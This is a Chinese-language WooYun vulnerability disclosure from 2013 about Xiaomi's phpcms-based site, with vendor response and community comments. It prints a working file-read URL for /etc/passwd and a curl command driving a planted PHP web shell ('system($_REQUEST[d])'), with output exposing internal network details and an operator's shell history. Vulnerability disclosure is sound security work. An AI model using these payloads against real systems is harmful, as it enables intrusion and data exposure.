当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041385

漏洞标题:一次小米未完成的内网渗透测试(仅测试可能性)

相关厂商:小米科技

漏洞作者: 路人甲

提交时间:2013-10-29 17:15

修复时间:2013-10-30 10:36

公开时间:2013-10-30 10:36

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

典型的一个分站业务导致的问题,本来想证明下业务架构和运维方面的问题,结果近期比较忙结果业务下线了,悲催!
PS: 猜猜我是谁

详细说明:

www.xiaomi.cn使用phpcms搭建

http://www.xiaomi.cn/api.php?op=ajax_domain&url=/etc/passwd


0.jpg


1 (2).jpg


1.jpg


3.jpg


4.jpg


5.jpg

漏洞证明:

curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=id'
uid=10000(work) gid=10000(work) groups=10000(work)


curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=/sbin/ifconfig'
eth0      Link encap:Ethernet  HWaddr 00:25:90:97:E5:14  
          inet addr:10.21.1.107  Bcast:10.21.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1903443069 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2863354900 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:987513424371 (919.6 GiB)  TX bytes:2483428852473 (2.2 TiB)
          Memory:df980000-dfa00000


#1377263539
ls
#1377263549
vi /home/work/app/php/etc/php.ini 
#1377263569
/home/work/app/php/run.sh restar
#1377263571
/home/work/app/php/run.sh restart
#1377263708
tail /home/work/logs/php/php_error.log 
#1377263752
vi /home/work/app/php/etc/php.ini 
#1377263862
/home/work/app/php/run.sh restart
#1377264188
vi /home/work/app/php/etc/php.ini 
#1377264319
/home/work/app/php/run.sh restart
#1377264540
vi /home/work/www/api.xiaomi.cn/config/database.php 
#1377265088
tail /home/work/logs/php/php_error.log 
#1377265097
tail -100 /home/work/logs/php/php_error.log 
#1377265318
curl -I -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10
#1377265328
curl -i -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10
#1377265340
ls
#1377265342
cd www/
#1377265342

修复方案:

应用架构有问题(第三方的可有监控?)
网络架构有问题(网络边界是否有隔离?)
系统架构有问题(是否将运维和线上业务账号分离?)

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-30 10:36

厂商回复:

现在的“白帽子”是越来越看不懂了,以前一定是会报“小米网phpcms任意文件读取漏洞”。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-29 17:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    应该是 @猪猪侠

  2. 2013-10-29 17:24 | xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)

    mark

  3. 2013-10-29 17:37 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @xsser 我的某个洞子在首页展现了,但是没有收到邀请链接,处理下啊!!!另外,卤煮,你也要换马甲了啊?

  4. 2013-10-29 17:37 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)

    mark @猪猪侠

  5. 2013-10-29 17:43 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    这标题风格一看就知道了

  6. 2013-10-29 17:45 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @小胖子 我猜是dell的那个

  7. 2013-10-29 17:51 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @寂寞的瘦子 NO!

  8. 2013-10-29 17:59 | 盈盈无绪 ( 实习白帽子 | Rank:44 漏洞数:14 | 此人很懒)

    mark

  9. 2013-10-30 01:44 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    虽然老夫很抵制小米的操蛋售后,并呼吁周围人不要买小米。但是这次渗透和本人无关。

  10. 2013-10-30 08:24 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    此站点已经废弃下线,感谢猪猪侠的精彩分析。

  11. 2013-10-30 10:43 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @px1624 哈哈哈,你看厂商回复,厂商都在猜是谁了,怎么忽略了呢?

  12. 2013-10-30 10:45 | Mr.Jen ( 路人 | Rank:13 漏洞数:2 | 开放自由)

    小米生气 猜不出是谁 干脆忽略,叫你让我猜。。。

  13. 2013-10-30 10:53 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    学习了

  14. 2013-10-30 10:59 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    我去,为啥忽略了,搞不懂

  15. 2013-10-30 11:16 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @带馅儿馒头 @小胖子 我也没看懂怎么忽略了。。哈哈 @xsser

  16. 2013-10-30 11:31 | 请好心人解放我的左手 ( 路人 | Rank:12 漏洞数:2 | 昨天,有一个女孩拒绝了我的爱意,第二天早...)

    哈哈 已经被修复了

  17. 2013-10-30 14:38 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)

    @猪猪侠 哈哈

  18. 2013-10-30 14:53 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  19. 2013-10-30 15:17 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  20. 2013-10-30 15:43 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  21. 2013-10-30 16:16 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    厂商的回复我怎么没看懂?谁翻译下,究竟要表达什么。。

  22. 2013-10-30 16:17 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @疯狗 双引号用的nice。

  23. 2013-10-30 18:34 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  24. 2013-10-30 22:39 | Eric ( 路人 | Rank:1 漏洞数:1 | 网络技术爱好者。)

    @疯狗 现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  25. 2013-10-31 09:42 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  26. 2013-10-31 10:03 | 请好心人解放我的左手 ( 路人 | Rank:12 漏洞数:2 | 昨天,有一个女孩拒绝了我的爱意,第二天早...)

    我小米社区刷了24W分 被封了,还说进去看看给解封了, 没想到这么快

  27. 2013-10-31 10:18 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)

    @疯狗 厂商的意思是说 “不就是个PHPCMS任意文件读取漏洞吗? 你写那么严重干嘛? 谁让你写内网渗透的? 这下要挨领导打PP了。 ”

  28. 2013-10-31 10:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @x-star 感谢解答厂商的意思,我是真没理解,现在明白了。厂商遇到问题可以沟通么,何必选择忽略漏洞呢?哎

  29. 2013-11-06 20:14 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )

    看来是生气了。

  30. 2013-11-10 12:29 | 何松 ( 路人 | Rank:18 漏洞数:4 | 你看)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  31. 2013-12-24 11:49 | winsyk ( 普通白帽子 | Rank:108 漏洞数:16 | 越长大越孤单)

    现在的厂商越来越看不懂了,官网都被人搞了还很牛的样子

  32. 2014-03-29 03:27 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    作者的意思应该是 通过这些可以完成内网渗透 而厂商 觉得这仅仅是一个任意文件下载而已